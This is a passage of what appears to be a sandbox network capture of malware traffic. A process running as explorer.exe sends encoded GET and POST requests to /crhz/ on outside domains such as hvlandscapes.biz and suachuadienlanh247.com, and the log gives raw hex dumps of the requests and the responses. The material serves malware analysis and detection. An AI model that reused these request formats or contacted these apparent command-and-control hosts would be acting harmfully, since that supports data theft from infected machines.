64 39 72 38 68 53 66 78 63 7a 49 72 33 4a 33 35 51 6f 6e 38 55 6e 62 55 4c 44 70 68 47 52 4b 4a 4f 70 33 69 4d 32 4e 54 33 75 6e 6a 66 6c 57 56 5a 33 37 49 41 69 66 31 48 6e 78 79 6f 4b 34 7a 38 55 37 77 2d 4e 7a 68 48 33 71 38 70 43 38 6b 73 32 51 6e 6f 34 34 62 76 31 47 59 42 44 33 52 48 35 6e 48 41 76 64 6e 42 4b 34 31 35 61 30 51 78 45 49 58 48 49 69 44 4b 73 75 72 50 42 66 4d 72 31 63 64 49 44 39 28 65 4c 57 7a 55 6f 78 76 39 4a 51 50 65 63 51 74 4f 28 36 79 69 4a 6b 52 31 64 6c 47 79 51 35 70 45 73 52 43 6c 50 61 75 46 4a 61 56 7a 71 76 74 37 4a 6a 79 5f 4b 2d 7a 6a 50 6b 55 4f 57 67 30 63 73 79 44 61 6b 75 59 5f 45 4e 71 42 42 43 70 70 6a 36 77 69 61 6e 61 41 69 32 6c 4b 31 32 73 45 49 50 4c 48 6b 44 36 50 4e 41 6d 45 44 34 7e 49 4c 6c 64 4b 69 52 57 4b 53 4b 6f 74 76 34 63 37 6a 42 71 64 53 74 4d 6c 4c 55 7a 2d 6a 5a 6c 2d 7a 30 47 78 5a 48 42 6d 65 73 77 71 7e 77 38 79 67 38 49 53 71 77 4d 4d 65 34 6c 34 63 47 56 4d 61 7a 31 43 59 38 49 31 68 6c 6c 4e 6c 37 48 4e 4c 39 51 5f 4b 32 4e 6d 55 42 44 4f 51 73 59 6c 77 5f 6c 75 78 6a 36 70 4c 53 53 4a 72 55 54 67 30 4b 4f 78 41 65 79 33 47 61 45 51 69 70 49 71 72 66 47 38 5a 65 57 6f 5a 61 31 54 72 55 30 Data Ascii: Mkn=PAqkdS49ivc9LmwK(LTcDHEVsmqEm6IejxgrFQkuEwyWjJQPIxLwiYUbWMK7QXx8V_vGnEaYJ6Mv3W48ERU7Vi3TEBul0nSaYF8Dmi~iF3ujwZUWKRgA3aWBIdaYX_somS4AJgdojqlUG1SWdrMFhR~A4Amc1sPVGWhiZJD3o2wWxt8k(8TgQIu8iyBjPmuqPDq3JOh9yp35AMwzzF7E(Ld65qaLjGrzgUKibGbE(KBv8BeVQU96zyl4qENmp34lwIdI~cWtd89OyU3ZjAii69rrj1qu4AVN0BybWGvASAA9ntBap0MX8Sbl8RskZvWFjLYyEYnLodK8jT7sOZw2uGu0VhgTzk9vYcKP3JxPTUBW(sF18vQd~eJp1LCWOqJM7VCcXeXixU4GWUVqEG0UCsZFKtTtwlxDe130xh(srywLxB0ibfirk_eIfLJs7C0JVh9r~Zvtc77L20j3eqkpA07dDTFiUJTPa31C2j1iSMjLDc0Ys3Eu(8RCwouCjHAq1bVTIzLKi1reHL0z8JUpfBvkRk3Mlke7yd5DJ9Ogkgg2AKBJ(kKs2SVMA9F37CLGYgAa2fa0cUBu(_P26U~Q(-rUq4mO6Wtq0wnB0dzNFhln4zTaziH7NNywcYXF5oR6soNSbsyN1n6NvfuECLsTz1udGrXAYJ04cK6aMTK608Bl5MHhW2j6KpAzK7xfQRWNd-jtCQ1GNjTvInLvbRnU0h5KdzOCVBMRWrd3lR5bFzhRBIPJRnv1AbbfrnP0NmngugcK8QRqPHvtoqkwD2ActInwLV43Qx2RpM668x9A7OFrbw3Zrzt7ZRDJKyksTNSjrGmz3shMewHVzNLce-Kba_wSwqpCahFOrTYG7XH640o-rlZedW7hra2nlMI881aZE8(TCHmWua8UllQbk4oCwMqTzjk4eNt7sq~rLvjJPRUnHHgFZz34k3kkz-ev1cg85QryU3od9r8hSfxczIr3J35Qon8UnbULDphGRKJOp3iM2NT3unjflWVZ37IAif1HnxyoK4z8U7w-NzhH3q8pC8ks2Qno44bv1GYBD3RH5nHAvdnBK415a0QxEIXHIiDKsurPBfMr1cdID9(eLWzUoxv9JQPecQtO(6yiJkR1dlGyQ5pEsRClPauFJaVzqvt7Jjy_K-zjPkUOWg0csyDakuY_ENqBBCppj6wianaAi2lK12sEIPLHkD6PNAmED4~ILldKiRWKSKotv4c7jBqdStMlLUz-jZl-z0GxZHBmeswq~w8yg8ISqwMMe4l4cGVMaz1CY8I1hllNl7HNL9Q_K2NmUBDOQsYlw_luxj6pLSSJrUTg0KOxAey3GaEQipIqrfG8ZeWoZa1TrU0YYtEeMs1j81TtwW4LxHyw07q7L-~pDcVy89HDeBJ8WTOYFigUBXfJ9Ge-q5KYqBExeeJl2fXknJXkP5NPCtZdun3GpgWPuFkvEK0Qs_xQ4BfiHYc6C4r1IX91xNAU(9SS6E8qkZNPPsItrXHnUloF8KKYaWgqlPi_QMOH2RkCU3SapXKiFIPKcSVp(4qpNjvGmAIJZTlaOSO03Oyk75rpleo31OD7xZ96r1nAo0a2sr5v6K(u29YmRqW4kD0UTu5QmUMKAEwI3cMWNbTsUOwVflqXpiOkrMAAjwkxJ5pIhAgTL4NHyF4QxKNJsw(2ypRj6dvgOzTEzeKqeX3Eaam394g-Bq7pkZjAs4eiHFwv9cJwLsgz0EiaICwM8nM7(pTHcQ3xxSif7u~YliJxPqX3XkwXBmOhW89Wq7T7MxdkTFXoPlAfRpdD8gfvGPnEOZRJB1wbDW7HsMP0A2TlFcLTzV5jMGlRff5_Zj34kB9w9ikrDIMLnaXl24OpZ688A9kGbvTOFAwBstOWOhte8zL4Eg7q4Wnp5HInpu48ZiSTlwYQKCVJyFUu1ui6szzbi_ZhmnbT6MWi~_hZAsYH(9SMt07e93swqyWwvUNDNKrEJrxZPwVia3(qQTOA7Qdhe4tujdmFJEtMoEfA0C6ptXHQHxFz8GiAsvq_ILAig9Dac3bwU0iUPgetRvqfOE2llRYqea99dUBcoQ2pl7JGvQTodPyPyaNafboSfg9LUkq45Cqe5vVKBNBWeaBD4UtlLvQMS2hmUM1qI20uzuFrpSIXr9(OaxflfiMeIgq74XzEMP9RdZ~RftwTsjNLTv4HqNxKQqSHCtuwqlWtA7qFEFcLtBRxqVsCB7Nd9p6T8rRqqSB1iXVWQZYmQlW1W2kf6_W5LEYRCBTN9Zkuulr-P-J4o7e1PjP6pymZi-twJjRlWKc02kfTByJRC9CsQ6fzdZltt8pkg6kZ(OxIzCmChNiWzUaBl_nwk9viONXjKMIyChtMGd5RXd9xBs3ZaGFCoYKas6PHaJxYd4S55QDOU-SHKwxNAwlRVSYJquMbyx3Jl2VbssL_xfJ7Hph4e7kasQTVC4T32h~oALNfZge88sEzf0p0q1NddbSG23~GxmK_6H~-SgCVS8WMWY8jYIX2cWpciyL4xn(8MWrkwBta5SzY5zyKzSbUThrUYVyLEaWzPjzcs88rivJldnbAZ42W34xn~JMWxqEqomiP5tIeLdZj4aVgo8iPnnA8aZfs97xCMogfleUo29QxbSzPs436OfDIelZ6c_wfKypgK6cHKyMg6sRruqG8pwjIt0QFRG4aJRUrzxoaLs4FC6KmmVSUqx0uTEf_TOcK~sOthpJeiSm6iftK2LA9GOtXBZRPd0Df1MbaTD3x7PWyb84Gk_qW7RGnXAVNAC(Inx0l9mo4uBqsgdQhzk1OwZCbpvRpk9iyTKM6RawE00mNVbn0Xfh8NJ(f8tu8a8v3ecw_mwvgAmeNuogZQsNDP8KX0JK7vv2_fdDNL2lRpnDqt_j4OAXoD_uelmEJCfNAhmEQifdJJiqBM7bw4QvUvwl2xvv9ZXCp0gLb61SWCldTi_(UdmLu5Ls1HMHlEAHUheW2j7hjRVMmRvfzEnbqVBXtP5R9eTqm04ms8ZL2LDPa8CV8xAKw9IJFoXc-BJ5Zu0EFBuQmDk39ij0tZoaN1jF8VdLZ~vY4CquTVtlJfXn4mwZiykh2mynBxlosEtGyq-lmvf~9QjQaKvVBSsnm9KHPkfKBKeoq8R7WGC1apQPT95CzkD(k9P9NmJHRQ6U99Yu-6v1nm0IneHp-Q6t-2okkz_svhePUzMpM7ErqN1gmeQ5rk1V7AqupXWeJMEegX_qIX4FHhYral_mdiBLKSnMA(F2rMoz18kVFE9DeoY6UFmSM255WYf(0FXaSlHCpGFR1sqvxOLk17Jwos3j_JxRtOa0LIf6No7NTOJAPQEZU6VpwYtirTFd_6rrNJbrIrPsAlSqXJdKz3R2UhtrTWLnJILTxYvQDs_1crZ35kZU-Z_xfYDOZWrtRtjzh1OZNl07Kuo29x70cR5Zs2A4YyYJW9hUls5RgMa97bFtWOpY6BrZkwAVXg5UEsUVPlzmc1TqWSptvPa1mJkoO5daBWkxXWcM1ZhebcQLYElfTccnej06PUZ8KhKboLyLqx1sNzlgGeJODDpFVlIMUIeHHwd622YIge0t4s0yAq2IZep2S6UPK~WAyYf~_Spix(Uf8aKtUfQSX7NLsTZF78PnPT47pneP19q3VFJX6zOjraBqzm2gK0C7DX9DTn7b-UdvgP8mFPpQx9K63HcB7Nd3Qbd9aaOnBkXdOJuawr6wQ1Sm1PUyt11LFO_yTY6XyzSWX53J4axhUvJptR_bzdilHW-bFHowy2BDh3xQzQTe5C6(xgqHBaC7koLPyaNttXI9wrH6QkNXHsDil9A5wkrGT(HLfB2g8z9Adb3fRMiLwt6EfkTkZxgHSmOemw-F0B9EJZilCpKbluxpKtTmxvRCIPh5Y6PHZl4LfLFeDepzZXIVrbiFQMPcQ487KDr2ue2oS1XBUF9y_owEQqWKeL2JvYmc49e0FHm8-T5vG2yMfAlSBCcfnNTlzfvuDLVSfJGijlwusKItYkApzI0nVjtULmGqAf5yIDFbnvhgvk-hryj(GtSOHNb7IJPA36yOawbLEkkI1rAoapTbP~_Qpq3CFHgg382
Jan 25, 2023 13:22:44.243750095 CET	223	IN	HTTP/1.1 404 Not Found expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/" content-encoding: gzip vary: Accept-Encoding transfer-encoding: chunked date: Wed, 25 Jan 2023 12:22:43 GMT server: LiteSpeed connection: close Data Raw: 31 36 38 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5c 4b b3 db c6 72 5e 5b bf 62 44 d5 3d 87 90 01 1c 00 7c 93 a2 9c 6b c9 aa b8 62 5f bb 2c 79 91 b2 54 aa 21 30 24 61 81 00 02 80 e7 61 fa ac b3 c8 2a 95 3f 70 93 5b d9 25 55 a9 54 56 f6 22 0b a7 f2 3f f4 4f d2 3d 83 17 f1 20 40 52 ba b9 7a 1c 12 33 3d 5f f7 f4 f4 74 f7 0c 66 ce 93 87 cf bf 79 f6 ea 6f bf fd 82 ac a3 8d f3 f4 c1 13 fc 20 0e 75 57 f3 ce b5 dd c1 02 46 ad a7 0f 3e 79 b2 61 11 25 e6 9a 06 21 8b e6 9d ef 5f bd 50 c6 1d 72 95 d6 b8 74 c3 b0 09 bb f1 bd 20 ea 10 d3 73 23 e6 02 e5 8d 6d 45 eb b9 c5 ae 6d 93 29 fc 41 26 b6 6b 47 36 75 94 d0 a4 0e 9b eb 1c 27 07 73 19 78 0b 2f 0a 2f 53 90 cb 0d bd 55 ec 0d 5d 31 c5 0f 18 32 99 3a 34 58 b1 4b de 30 b2 23 87 3d fd 9b f5 6f ff e5 ae 48 f4 db bf 6d 48 b4 7e ff cb bf de 91 28 80 7e 10 f7 b7 3f de 91 8b 47 63 43 d7 67 e4 55 b0 e5 44 ff b2 21 e1 fb 5f ff 1d 7b c4 3f 16 ef 7f f9 93 47 ac ff fd 8f f7 bf fe 33 12 ac ed f7 bf fc 77 04 c5 bf fe 03 f9 9f 7f b4 df ff fa f7 2e 89 80 32 7d 70 7e fb a3 bb 26 46 7f f4 e4 4a f0 7f f0 c4 b1 dd 77 24 60 ce fc d2 72 43 14 74 c9 22 73 7d 49 d6 f0 6d 7e 79 75 15 6e a9 b9 de 52 cb 66 2e 28 78 0d 6d 55 d3 db 88 3e a4 6d 3b d4 89 58 e0 d2 88 75 48 74 e7 83 4e a9 ef 3b b6 49 23 db 73 af 82 30 fc f4 76 e3 40 15 f2 9c 77 9e ff f6 9f 5c 5a d1 75 db fd 08 fd 23 17 01 fd bb ad 37 eb 88 7e 74 d6 51 e4 87 d3 ba de 5c 2d 19 b3 ae 3a e7 f7 c9 87 21 fc 93 4b 40 fa 7f b2 ff ff 7b 05 ff 37 60 88 61 be 7b a1 19 d8 7e f4 f4 c1 8d ed 5a de 8d fa f6 c6 67 1b ef 47 fb 25 8b 60 20 56 21 99 93 5d 67 41 43 f6 7d e0 74 a6 31 83 d7 57 af af 42 f5 46 f5 82 d5 eb 2b 6e d0 e1 6b 00 0f d8 eb 2b de f8 f5 95 de 57 35 55 7b 7d 35 32 6e 47 c6 eb ab 8e dc 61 b7 11 b4 57 7d 77 05 0f e1 f5 ea 34 3c 68 c8 d1 e0 f3 0b 01 08 df f0 d9 db 06 26 eb 4c 77 1d 98 6c 30 22 bc 59 8c 2f e0 2b 35 f2 fa ea c6 57 6c d7 74 b6 16 b2 fc 31 e4 05 bc b1 02 43 ce a0 df ea c6 76 d5 1f c3 cf ae 59 30 1f aa ba aa 77 ee ef 67 0f ae 1e 3f 24 af d6 76 48 96 b6 c3 08 7c d2 6d e4 29 2b e6 b2 00 98 5b e4 f1 d5 83 87 cb ad 6b a2 69 74 99 4c e5 48 da 5d d3 80 b8 72 20 7b b2 3d a7 aa 19 30 a0 fc c2 61 38 22 dd 8e 49 dd 6b 1a 76 24 d9 9f db ea 8a 45 cf d0 67 dc 46 17 17 f9 a7 6e c7 b0 3a d2 2c 01 26 21 40 c7 c0 74 fe 32 0a 60 c0 d4 65 e0 6d 9e 81 7f 7b e6 59 4c 66 f3 ae af 9a d0 8f e0 3b 66 46 5d 4d d6 64 5b 15 de cb 56 d7 cc 5e ad 23 e0 a8 42 27 9c 57 88 4f 55 34 e9 bb 2e 98 60 28 33 09 c8 35 09 28 23 ef 39 8d e8 f7 df 7d d5 95 a4 59 c0 a2 6d e0 92 d3 71 a3 18 97 cd e7 f3 3d ec fb b4 63 66 97 89 6e 45 65 4d 09 83 05 35 44 6a 18 98 73 d0 80 6a 81 8f 0a e6 91 2a 66 25 6a ea ea 47 0a ea 14 94 32 45 15 c6 ed c3 cf ef 5e d1 d5 1f c0 3f 77 3b 18 13 3a d2 0f da 1b 94 8e b9 d6 b3 b5 ed 58 dd 08 e4 f0 Data Ascii: 168a\Kr^[bD=\|kb_,yT!0$aa?p[%UTV"?O= @Rz3=_tfyo uWF>ya%!_Prt s#mEm)A&kG6u'sx//SU]12:4XK0#=oHmH~(~?GcCgUD!_{?G3w.2}p~&FJw$`rCt"s}Im~yunRf.(xmU>m;XuHtN;I#s0v@w\Zu#7~tQ\-:!K@{7`a{~ZgG%` V!]gAC}t1WBF+nk+W5U{}52nGaW}w4<h&Lwl0"Y/+5Wlt1CvY0wg?$vH\|m)+[kitLH]r {=0a8"Ikv$EgFn:,&!@t2`em{YLf;fF]Md[V^#B'WOU4.`(35(#9}Ymq=cfnEeM5Djsjf%jG2E^?w;:X
Jan 25, 2023 13:22:44.243786097 CET	224	IN	Data Raw: 82 ae 37 ff 7d 10 d0 bb 6e 67 e9 50 b4 30 61 51 12 70 0b b7 3e 06 87 70 be 63 60 14 77 d0 27 77 35 7d a8 c9 d9 d3 17 b7 26 f3 a3 17 d0 10 ca ef e5 60 ae cd 82 27 9e ea 30 77 15 ad 67 c1 a7 9f 4a 19 ca 0f de 0f c1 9b 37 f3 cc 58 a4 9d bd ec fa 17 Data Ascii: 7}ngP0aQp>pc`w'w5}&`'0wgJ7XC]\|v;ePHoIBi<haM#y8zylhy2TWK=d0`86g]<_-]\Zz=tc?F/szUGg8H@Sf\
Jan 25, 2023 13:22:44.243803978 CET	225	IN	Data Raw: 60 c6 66 71 94 0b b5 6f df 8a e9 ba 13 fa 51 50 b7 a0 3f 94 71 76 03 b3 4a 59 40 1a ff 2e d1 41 5d 6b 2e a9 0d b1 74 97 1f 06 ad 96 9e 84 d7 ab 1d 84 00 b1 85 0d 3a 41 76 f8 1c b7 14 05 b8 f1 30 35 b7 41 00 5e e5 19 f6 7b 56 c8 70 b9 be 60 9e 46 Data Ascii: `fqoQP?qvJY@.A]k.t:Av05A^{Vp`F^:.Nuc[idXpm7-5H9[.~p=Rqvu3gqK\gao)dm]$SXHV&5"4^?R>h[%OTKc
Jan 25, 2023 13:22:44.243823051 CET	227	IN	Data Raw: 53 65 20 1e 33 4b 5f 9a 87 b0 f3 d4 22 37 3e 44 2d 52 65 20 9d 2c 06 3a ab e9 23 9e 73 6b 18 3d 8c 7e 01 0d a3 06 bb f1 03 b0 f0 00 cd 65 f2 fc c5 0b a3 86 2a 7d a5 07 74 bd fe e0 59 1d 5a 84 bb 6f 82 ec c5 10 ff 16 c8 d2 dc b0 b4 e6 48 97 21 49 Data Ascii: Se 3K_"7>D-Re ,:#sk=~e}tYZoH!IkDXP#0`Q,X@aWd/R-dVPXKka-5rhfvR10@ejkqQ6>?51/.qm7'OMMs A>
Jan 25, 2023 13:22:44.243844986 CET	228	IN	Data Raw: e6 46 23 b8 78 bb b8 67 f6 95 f0 46 d6 b9 3c 83 fa 91 dc 7b 7f 5a b2 fd fc 7d 99 f2 2c c8 d7 36 8c c8 c7 51 51 15 8f 0f af a9 2a 2e 1f 5d 61 7b 5e 3e 55 9e 94 7b 16 01 a8 e8 ce a5 5d f6 a2 a7 1c 8d aa d2 43 69 f6 b1 87 1d 73 cc 56 62 a5 c9 a8 54 Data Ascii: F#xgF<{Z},6QQ.]a{^>U{]CisVbT3jj5MvZ-lAU!y_E)]p^[Ir%AzXX/CXN#\|.r=HH$Yw{wVqq/8%k>+[
Jan 25, 2023 13:22:44.244452953 CET	229	IN	Data Raw: 34 35 63 0d 0a ec 5d 4b 4f db 40 10 be f7 57 ac 7c 01 24 62 af 5f b1 5d 12 da 52 5a 84 54 a4 2a 6d e9 b1 72 12 bb 18 39 71 64 1b 4c 0f fd ef 9d d9 5d 1b 3b 4f 27 84 24 6a c2 01 f2 da d9 99 d9 6f c6 63 b2 3b 5f e9 60 3e 92 78 e4 db 1b 45 4b f6 c5 Data Ascii: 45c]KO@W\|$b_]RZT*mr9qdL];O'$joc;_`>xEKd5lqVfv,9+u6cIo;y]t!z^=/gI{6q!SA%>LwP)=\|ACjtx# 9\|_;:!#M\r.ciaKL3x
Jan 25, 2023 13:22:44.245076895 CET	230	IN	Data Raw: 36 64 66 0d 0a dd 5d 3b 6f dc 46 10 ae ef 7e c5 84 2e 4e 46 4c 9e 78 77 92 25 e8 51 44 31 12 03 36 60 c0 ea 05 ea 48 e9 18 f3 c8 33 1f 91 e5 c0 55 8a 14 69 92 32 55 5e 45 aa 00 01 d2 f9 8a 14 36 f2 3f ee 9f e4 9b d9 e5 9b d2 e9 8c 34 49 21 91 5c Data Ascii: 6df];oF~.NFLxw%QD16`H3Ui2U^E6?4I!\ggfggxRZLI#qBXz^ly+zQrE\|[eNHVLFSD1EK"4Y;-PLY^z@qgZ9%Mgr8_5"?V`
Jan 25, 2023 13:22:44.245099068 CET	231	IN	Data Raw: 8b 4c e4 6a 77 3e 37 55 7e c5 c9 55 a8 ab 22 94 9a 11 dc a0 be 11 ee 68 5e 6b 09 64 f5 1e e1 9a 0c 1b 95 a9 f9 5e 77 ba 58 b9 c3 a9 bb 73 d4 5a aa 45 c7 79 b1 6a 52 d5 aa 95 24 7b c5 76 64 56 3c bd bb b6 b7 45 17 59 28 31 ce d6 7d 91 22 6c 03 b1 Data Ascii: Ljw>7U~U"h^kd^wXsZEyjR${vdV<EY(1}"l@2y\}2(&9xT5?51W~J9T4uDm;\r>jh^a93Lg8X)7]^A]`16?xalS~V3z\> nhN
Jan 25, 2023 13:22:44.245114088 CET	231	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49716	103.221.223.104	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:46.693219900 CET	231	OUT	GET /crhz/?Mkn=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V9OkWwUAiG/UylYA==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:22:47.028659105 CET	232	IN	HTTP/1.1 301 Moved Permanently expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://suachuadienlanh247.com/crhz/?Mkn=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V9OkWwUAiG/UylYA==&vux=DmStydFUWc8HD content-length: 0 date: Wed, 25 Jan 2023 12:22:46 GMT server: LiteSpeed connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49717	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:52.103975058 CET	234	OUT	POST /crhz/ HTTP/1.1 Host: www.hvlandscapes.biz Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.hvlandscapes.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.hvlandscapes.biz/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 63 67 4b 7a 71 7e 50 28 51 44 47 30 4c 52 70 30 39 62 47 50 53 65 47 31 50 71 6e 48 62 35 52 30 5a 48 74 75 78 48 36 55 46 36 76 51 76 64 76 63 6c 4b 5a 41 6a 4d 75 4b 76 6d 66 56 59 52 6b 47 41 49 43 37 70 33 6a 42 51 41 52 71 30 74 66 66 37 6d 65 6c 70 65 42 52 7a 7a 51 65 54 79 6c 43 6c 52 30 55 74 57 7a 6d 45 68 37 76 79 6f 42 36 6c 6e 43 65 30 53 41 79 37 76 79 6b 56 67 64 4b 5f 4a 67 78 58 43 58 44 49 6d 6e 79 75 67 48 4b 62 7e 62 78 50 44 43 38 4e 62 6d 75 35 7a 5f 68 65 73 4e 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=gknP8NpQx3TQ3cgKzq~P(QDG0LRp09bGPSeG1PqnHb5R0ZHtuxH6UF6vQvdvclKZAjMuKvmfVYRkGAIC7p3jBQARq0tff7melpeBRzzQeTylClR0UtWzmEh7vyoB6lnCe0SAy7vykVgdK_JgxXCXDImnyugHKb~bxPDC8Nbmu5z_hesNWg).
Jan 25, 2023 13:22:52.125593901 CET	234	IN	HTTP/1.1 301 Moved Permanently location: http://hvlandscapes.biz/crhz/ vary: Accept-Encoding server: DPS/2.0.0-beta+sha-0ec0b2a x-version: 0ec0b2a x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Wed, 25 Jan 2023 12:22:52 GMT keep-alive: timeout=5 transfer-encoding: chunked connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49718	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:54.644524097 CET	240	OUT	POST /crhz/ HTTP/1.1 Host: www.hvlandscapes.biz Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.hvlandscapes.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.hvlandscapes.biz/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 34 63 4b 67 5a 6d 50 35 77 44 46 6f 37 52 70 69 4e 62 38 50 53 53 47 31 4f 75 33 48 74 42 52 78 65 44 74 75 54 76 36 53 46 36 76 42 5f 64 72 52 46 4b 50 41 6a 5a 66 4b 75 36 6c 56 65 4a 6b 47 53 67 43 79 70 33 67 49 51 41 53 74 30 74 63 53 62 6d 65 6c 6f 6a 39 52 79 7a 41 65 54 4b 6c 43 58 5a 30 55 6f 69 30 6e 55 68 36 74 79 6f 42 36 6b 62 52 65 30 53 51 79 37 48 63 6b 56 41 64 4c 74 52 67 79 43 32 55 58 6f 6d 6b 73 2d 68 6f 4c 70 6e 57 6c 63 44 4a 33 62 28 37 6d 63 75 6f 76 2d 77 43 41 74 65 4a 58 41 48 4b 37 59 38 42 43 57 33 6e 28 6a 45 76 6e 36 75 78 41 56 77 42 38 50 34 35 65 43 59 4e 68 50 4f 76 66 66 71 68 75 6b 73 4a 41 37 51 57 7a 6e 36 51 55 67 4c 47 56 69 47 4c 69 6c 75 6b 63 54 41 32 6b 31 53 4a 79 66 55 61 4d 54 68 57 4d 63 43 53 4f 34 6a 75 36 78 57 30 49 54 70 2d 78 62 42 59 74 37 49 6f 58 36 4f 58 38 35 6f 47 4a 65 38 35 70 39 76 4c 77 76 7e 44 59 31 30 4c 64 6b 6b 52 74 30 4c 65 6a 70 6c 6a 4d 63 32 35 6c 56 33 4e 61 51 58 41 43 34 66 78 6f 46 7a 39 35 37 4e 4d 39 6e 4f 34 65 6b 28 2d 4c 79 33 4f 47 59 73 2d 4a 5f 41 2d 73 6f 31 33 6f 57 75 44 4b 48 71 76 77 38 62 72 78 6f 41 61 6d 56 58 35 38 75 7e 56 33 44 69 31 43 45 76 42 61 31 49 51 6c 46 4a 37 7e 70 34 75 51 4c 68 68 51 6e 47 6d 4b 4e 34 49 77 2d 6a 54 42 65 53 70 41 51 5a 78 7e 65 57 58 75 65 5a 38 74 2d 50 57 72 6d 6b 47 34 6f 72 75 61 62 65 61 66 35 6b 34 78 4f 7a 76 45 73 6c 74 65 34 75 65 30 31 70 62 31 72 31 43 65 61 35 39 67 32 66 65 5a 4d 7a 4c 6a 6d 4a 73 55 63 7e 66 65 4f 6f 70 6a 30 39 35 41 68 4e 78 34 46 35 73 47 61 4a 71 54 52 6d 72 48 69 4d 6c 46 65 55 4e 75 50 30 2d 75 61 36 74 4c 42 69 37 62 55 53 33 53 71 53 65 68 4b 73 6e 51 4f 6a 34 71 64 59 67 41 77 66 59 55 35 41 58 4d 34 45 4f 63 31 36 57 54 68 57 2d 49 73 33 6c 47 33 70 4f 37 56 58 33 30 74 7a 70 37 59 74 78 71 48 72 4c 4a 6a 38 4e 35 58 77 38 72 6e 4f 4e 59 53 53 46 64 46 59 7a 34 6c 41 52 33 46 5a 6a 4a 39 76 52 31 43 73 63 68 49 75 47 37 41 31 79 62 6f 73 2d 32 64 4d 61 56 73 73 34 76 52 64 35 6e 4c 42 5a 55 6f 58 45 6c 78 61 44 61 66 45 57 7a 35 6c 6a 4c 56 43 6d 58 4f 4a 32 42 69 59 75 35 48 35 71 4b 42 44 33 71 56 53 47 28 38 64 49 71 64 6e 42 48 6f 51 55 6f 74 68 78 54 45 55 53 6b 43 51 38 65 36 55 37 43 77 53 74 30 32 53 31 35 67 56 31 39 6a 34 39 32 41 75 66 6b 4e 65 43 73 30 39 56 6e 62 30 2d 63 43 51 75 50 52 78 4a 33 4a 6f 44 28 36 35 31 58 51 6e 6c 56 62 44 36 4f 6d 62 71 71 66 62 75 6a 76 34 78 39 71 4c 58 66 2d 47 4c 73 33 6f 64 33 37 67 41 45 72 51 4d 64 55 31 62 64 65 31 54 74 72 6d 45 4b 68 42 59 4f 4c 47 56 33 52 71 74 7e 70 4a 43 33 69 36 67 74 75 59 37 75 39 4b 67 51 30 32 4f 4f 61 34 34 71 57 6f 37 58 71 4a 36 52 32 4a 66 6a 4a 7a 57 51 76 43 73 53 6c 65 6f 38 78 46 31 43 77 68 65 4f 53 78 4e 45 37 44 45 34 56 42 30 5a 58 63 36 34 77 52 6a 53 55 58 41 4f 63 52 59 62 6b 42 31 6d 66 61 4d 57 52 4a 74 45 74 50 54 45 64 72 4b 51 62 62 77 4f 43 32 57 79 64 4f 69 42 4f 6f 70 75 35 6e 57 32 44 54 6b 48 78 53 42 68 36 72 69 7e 32 33 67 7a 51 62 79 65 73 57 53 54 5f 76 4f 35 4a 4b 42 68 6d 77 67 58 49 6c 6b 59 41 74 71 38 46 7a 73 31 42 77 37 52 6b 52 72 69 41 4d 58 36 59 32 76 77 47 46 57 48 4d 73 5a 51 52 52 5f 41 54 34 4f 33 76 68 79 72 32 34 59 57 6b 77 55 42 4d 36 37 7e 71 6b 35 4b 32 6f 36 39 64 41 53 69 78 45 6f 61 48 49 32 7a 6d 6f 43 4b 78 61 4c 55 41 46 71 4b 35 68 31 6e 6e 4e 47 44 5f 39 66 77 6b 42 41 37 5a 57 71 28 68 6f 38 32 56 31 36 44 51 34 6d 4c 64 7e 76 7a 39 44 4a 79 61 6d 51 50 36 6b 6f 50 30 6f 42 5a 32 44 62 41 65 69 77 72 51 51 34 69 35 6c 78 72 56 45 67 52 5f 47 56 71 42 4f 6e 46 53 6d 53 46 78 62 31 5a 4d 68 6a 70 51 72 38 54 63 76 44 55 4b 6a 68 5a 52 7a 50 7a 76 7a 38 66 44 65 74 7e 43 45 4d 72 61 72 46 36 4b 54 33 7e 67 56 31 46 6e 6e 55 76 35 7a 37 45 53 4e 50 46 6f 32 58 39 47 39 55 7e 39 55 6e 65 62 62 34 68 66 79 54 6a 76 63 5a 64 63 7a 34 42 54 68 49 6f 35 64 7a 6a 54 6e 64 4a 2d 52 49 6b 45 76 42 46 44 7a 4c 69 48 75 42 79 6d 38 6f 7e 33 32 